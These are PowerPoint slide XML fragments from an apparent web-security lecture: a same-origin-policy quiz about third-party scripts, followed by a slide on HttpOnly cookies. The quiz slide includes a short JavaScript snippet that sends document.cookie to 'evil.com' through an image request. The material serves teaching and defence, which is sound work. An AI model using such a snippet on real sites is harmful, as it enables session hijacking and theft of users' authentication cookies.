            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
                <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SOP Quiz #2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EB2AB7B-094D-1B45-8932-7C5E277CFBB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2073276" y="2079626"/>
            <a:ext cx="8069263"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4290" tIns="34290" rIns="34290" bIns="34290" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">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296863" indent="-296863">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lvl="1">
              <a:spcBef>
                <a:spcPts val="1713"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="46000"/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              <a:sym typeface="Helvetica Neue Light" panose="02000403000000020004" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA7B187F-5AFD-8D43-997C-2FAE7799BB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2505670"/>
            <a:ext cx="8472578" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Your bank website includes a script from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>GoogleAnalytics.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Can Google steal your bank authentication cookie?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{730772E5-9A65-DA47-9355-F9020A62E890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1859711" y="3796670"/>
            <a:ext cx="8472578" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="50800">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("image");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = "https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>/?cookies=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9806847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5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D00E435-D099-9146-9BEB-4A9448B7D949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8157C86B-08E4-8345-92E6-EA9069E53241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4999823" y="3709012"/>
            <a:ext cx="3886199" cy="582615"/>
            <a:chOff x="4495800" y="3124200"/>
            <a:chExt cx="4300154" cy="685800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35138307-9423-8648-98C7-C7FB37247BFD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="3124200"/>
              <a:ext cx="3505156" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="30000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="lg" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="TextBox 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{507DEE3B-F9C1-D445-9630-E4C7A319AC1F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8042231" y="3152775"/>
              <a:ext cx="753723" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF3399"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scope</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD702B5-BF8F-E14C-824D-4D6A3BAAB209}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2332823" y="2353287"/>
            <a:ext cx="1128713" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1FBB16-18D6-9748-AB12-0940808C3D01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2485222" y="2489812"/>
            <a:ext cx="914400" cy="6096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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A8D556-CA31-D14E-8E06-6123164D0F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1951822" y="3191487"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 166667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BF5200B-8FE3-414C-8B09-F719CC11696C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1951822" y="3420087"/>
            <a:ext cx="1143000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3641C9C-7794-5243-A929-DB94186A380D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3075772" y="3186725"/>
            <a:ext cx="400050" cy="385762"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 252"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 243"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{715FD7E7-FF1B-3F4B-9002-9B42C53550A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7666822" y="2277087"/>
            <a:ext cx="1219200" cy="1271588"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D63182A9-7947-DA48-8F7C-98D582C16FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4762947" y="2180250"/>
            <a:ext cx="857927" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4350E9C6-B16B-2F4A-BE26-A7986EDE089D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3704422" y="3023213"/>
            <a:ext cx="5638800" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Set-cookie:	NAME=VALUE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	domain = (when to send);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	path =     (when to send);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	secure =  (only send over HTTPS);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	expires =  (when expires);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
